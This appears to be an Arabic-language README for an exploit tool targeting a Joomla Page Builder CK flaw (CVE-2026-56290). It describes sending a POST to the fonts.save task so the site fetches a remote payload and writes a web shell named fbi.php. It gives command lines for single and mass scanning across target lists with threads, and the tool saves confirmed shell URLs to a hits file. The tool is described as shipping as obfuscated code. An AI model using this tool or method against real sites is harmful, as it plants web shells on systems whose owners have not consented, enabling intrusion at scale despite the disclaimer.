
Page Builder CK لـ Joomla - أداة استغلال SSRF غير مصادَق / كتابة ملف عن بُعد تؤدي إلى تنفيذ PHP
فريق BlackHat Team ماسح إثبات المفهوم لثغرة Page Builder CK في Joomla المتعلقة بمهمة fonts.save.
POC CVE-2026-56290
المؤلف: @mrzblackhat
الفريق: BlackHat Team
الإسناد: Peyman Siyahi · MR.PERSIA
تفحص هذه الأداة مواقع Joomla التي تشغّل المكوّن المعرّض للخطر com_pagebuilderck. تستغل مهمة fonts.save لجلب حمولة خارجية وتكتب غلاف ويب تحت المسار:
media/com_pagebuilderck/gfonts/fbi.php
يتم تأكيد تنفيذ الأوامر عن بُعد (RCE) عندما يستجيب الغلاف المرفوع بمستند HTML يحتوي عنصر <title> يتضمّن Fbi Shell.
يدعم الفحص لهدف واحد والفحص الجماعي مع خيوط عاملة وحفظ الإصابات فورًا.
requestsurllib3pip install requests urllib3
python3 poc.py --url https://example.com --insecure
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
targets.txt — رابط واحد في كل سطر. الأسطر بعد # يتم تجاهلها.
Fbi Shellتُضاف روابط الغلاف المؤكدة إلى ملف المخرجات فورًا.
| الملف | الوصف |
|---|---|
poc.py | نسخة إصدار مشوّشة (شغّل هذه) |
hits.txt | ملف المخرجات الافتراضي للغلاف المؤكد |
python3 _build_obf.py
POST إلى index.php مع option=com_pagebuilderck&task=fonts.savefont.css البعيد يطلق كتابة الغلاف إلى gfonts/fbi.phpGET إلى مسار الغلاف والتحقق من أن <title> يحتوي Fbi Shellهذه الأداة مُقدَّمة لأغراض البحث الأمني واختبار الاختراق المصرّح به فقط.
الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني. المؤلفون وفريق BlackHat Team غير مسؤولين عن سوء الاستخدام. اختبر فقط الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
@mrzblackhatفريق BlackHat Team — Peyman Siyahi · MR.PERSIA
البحث والأدوات الأصلية من إعداد @mrzblackhat. لا تعِد توزيع نسخ معدّلة دون الإشارة إلى المصدر.
| Flag | الوصف |
|---|
--url URL | فحص هدف واحد |
--mass FILE | فحص أهداف من ملف |
--insecure | تخطّي التحقق من شهادة TLS |
--threads N | خيوط عاملة لوضع الفحص الجماعي (الافتراضي: 20) |
--timeout N | مهلة HTTP بالثواني (الافتراضي: 12) |
--output FILE | حفظ روابط الغلاف المؤكدة (الافتراضي: hits.txt) |